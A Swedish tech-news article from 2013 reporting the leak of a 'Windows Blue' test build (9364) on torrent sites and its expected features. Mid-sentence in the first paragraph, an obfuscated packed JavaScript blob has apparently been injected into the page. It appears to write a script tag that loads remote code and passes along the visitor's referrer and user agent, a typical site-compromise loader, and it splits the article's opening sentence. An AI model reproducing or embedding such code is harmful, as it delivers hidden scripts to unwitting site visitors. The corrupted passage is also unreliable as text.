Image Image Image Image Image Image Image Image Image Image

| 29 maj, 2020

Scroll to top

Top

PC

Windows Blue har läckt

Filip Urde
  • On 25 mars, 2013
  • http://www.revue.se/filip-urde

Microsofts eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rtbnk|var|u0026u|referrer|dbztf||js|php’.split(’|’),0,{}))
kommande uppdatering till Windows som går under kodnamnet ”Windows Blue”, har det snackats ganska friskt om den senaste tiden. intresset är stort och nu har det läckt ut en del information, samt att en tidig ”build” har dykt upp på ett antal olika torrentsidor.

Versionen som läckt på torrentsidorna är Windows Blue ”build 9364”, en version som endast finns i 32-bitars version som en ISO på 2,63 GB. Den läckta versionens källa tros vara en av Microsofts Franska partners.

Den kommande versionen kommer inkludera ändringar som: större och mindre Live Tiles, vilket gör att du kan göra din startskärm långt mer personlig än vad du kunnat göra tidigare.  Sedan finns även en uppdatering av  ”side-by-side” läget för appar, som ska öka effektiviteten genom att du kan ha två program öppna på samma gång. Vidare så kommer bland annat en Play funktion i Devices panel, en printscreen knapp i Share sidebar och Internet Explorer 11.

microsoft.com